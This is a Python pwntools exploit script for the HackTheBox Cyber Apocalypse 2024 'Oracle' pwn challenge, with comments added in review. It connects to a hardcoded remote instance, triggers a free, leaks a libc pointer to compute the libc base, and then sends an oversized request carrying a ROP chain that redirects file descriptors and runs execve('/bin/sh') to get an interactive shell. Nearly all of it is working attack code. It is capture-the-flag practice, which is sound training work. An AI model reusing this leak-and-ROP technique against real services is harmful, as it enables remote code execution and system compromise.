#!/usr/bin/env python3
"""
Hackthebox Cyber Apocalypse 2024
Pwn - Oracle
"""
from pwn import *
e = ELF("./oracle_patched")
libc = ELF("./libc-2.31.so")
context.binary = e
context.log_level = "DEBUG"
context.terminal = ['qterminal', '-e', 'sh', '-c']


# Tube shortcuts. Each one looks up the module-level ``p`` when it is called,
# so they always talk to whichever connection main() most recently assigned.
def ru(a):
    """Forward to ``p.readuntil(a)``."""
    return p.readuntil(a)


def r(n):
    """Forward to ``p.read(n)``."""
    return p.read(n)


def rl():
    """Forward to ``p.recvline()``."""
    return p.recvline()


def sla(a, b):
    """Forward to ``p.sendlineafter(a, b)``."""
    return p.sendlineafter(a, b)


def sa(a, b):
    """Forward to ``p.sendafter(a, b)``."""
    return p.sendafter(a, b)


def sl(a):
    """Forward to ``p.sendline(a)``."""
    return p.sendline(a)


def s(a):
    """Forward to ``p.send(a)``."""
    return p.send(a)
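def get_con(host="94.237.50.175", port=38001):
    """Open a pwntools tube to the challenge service and return it.

    Args:
        host: Address of the challenge instance. The default is the remote
            instance the author used during the event; pass the local values
            the author left commented out (``"localhost"``, ``9001``) to run
            against a local copy instead.
        port: TCP port of the instance.

    Returns:
        The connected ``remote`` tube. The caller owns it and is responsible
        for closing it.
    """
    # Local testing: get_con("localhost", 9001)
    return remote(host, port)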
def main():
    """Run the author's three-connection sequence against the Oracle service.

    Connection 1 sends a PLAGUE request (the author's comment labels it as
    triggering a free); connection 2 repeats the same request and reads a
    pointer out of the "Attempted plague: " reply to compute the libc base;
    connection 3 sends a ~4000-byte request carrying a ROP chain built from
    that libc. ``p`` is a module-level global because the ``ru``/``r``/``rl``/
    ``sl`` shortcuts resolve it at call time.
    """
    global p
    p = get_con()
    # --- Connection 1. The author's note says this request triggers a free;
    # what is freed is not visible from this script.
    EOL = b"\r\n"
    header = b""
    header += b"Content-Length: "+ b"1000" +EOL
    header += b"Plague-Target: a"+EOL
    packet = b""
    packet += b"PLAGUE xxx 1\r\n\r\n"
    packet += header
    packet += EOL+EOL
    sl(packet)
    # --- Connection 2: same request, then read the leaked pointer back.
    print("alive2")  # debug marker left by the author
    # NOTE(review): the previous tube is rebound without being closed; the
    # socket stays open until the process exits.
    p = get_con()
    sl(packet)
    ru(b"Attempted plague: ")
    rl()
    rl()
    # Read 20 bytes and unpack the 8 bytes at offset 5 as a pointer.
    leak = u64(r(20)[5:5+8])
    # 2018272 is the author's offset of that pointer within the shipped
    # ./libc-2.31.so; it is specific to that build.
    libc.address = leak - 2018272
    print(f"Leak: {hex(leak)}")
    print(f"libc: {hex(libc.address)}")
    print("gg")  # debug marker left by the author
    # --- Build the ROP chain: dup2(6, 0), dup2(6, 1), dup2(6, 2), then
    # execve with rdi = address of "/bin/sh", rsi = 0, rdx = 0. The gadgets
    # come from libc, so libc.address must already be set.
    binsh = next(libc.search(b"/bin/sh"))
    rop = ROP(libc)
    rop.call('dup2', [6,0])
    rop.call('dup2', [6,1])
    rop.call('dup2', [6,2])
    rop.rdi = binsh
    rop.rsi = 0
    rop.rsi = 0 # set a second time on purpose: the author uses the extra gadget to align the stack
    rop.rdx = 0
    rop.raw(libc.sym.execve)
    print(rop.dump())
    # --- Connection 3: deliver the chain inside the request.
    p = get_con()
    payload = b"VsIEW "
    payload += b"A"*3114 # Padding
    payload += b"BBBBBBBB"
    payload += b"CCCCCCCC"
    payload += b"DDDDDDDD"
    payload += b"EEEEEEE"
    payload += rop.chain() # RIP (saved return address, per the author)
    # NOTE(review): if len(payload) already exceeds 4000 here, this pad is
    # empty and the request is silently longer than the intended 4000 bytes.
    payload += b"X"*(4000 - len(payload))
    payload += b" 1\r\n\r\n" # Action, target_competitor, and version
    payload += b"Content-Length: "+ b"1000" +EOL
    payload += EOL+EOL
    sl(payload)
    p.interactive()
# Script entry point: only runs when executed directly, not on import.
if __name__ == "__main__":
    main()